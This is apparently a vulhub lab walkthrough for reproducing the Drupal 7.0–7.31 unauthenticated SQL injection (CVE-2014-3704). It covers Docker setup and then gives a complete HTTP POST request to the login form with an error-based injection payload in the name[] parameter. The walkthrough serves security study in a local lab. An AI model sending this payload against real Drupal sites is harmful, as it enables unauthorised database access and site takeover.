Table of contents
Vulnerability introduction
Drupal is a heavily used CMS, and there is a SQL vulnerability that does not require authentication. Through this vulnerability, attackers can execute arbitrary SQL statements, insert and modify administrator information, and even execute arbitrary code
Affected version
- 7.0-7.31
Environment build
1. Switch to the drupal related directory and deploy the docker environment
cd /root/vulhub/drupal/CVE-2014-3704
docker-compose build
docker-compose up -d
2. Check the status of the docker server
dock ps -a
3. After the environment starts, visit `http://your-ip:8080` to see the Drupal installation page, and install it with the default configuration.
Among them, the Mysql database name is filled with `drupal`, the database user name and password are `root`, and the address is `mysql`
4. The normal access page is as follows
Vulnerability recurrence
1. Use Burp's Repeater module to send the following data
POST /?q=node&destination=node HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a
2. View the returned results in Render in Response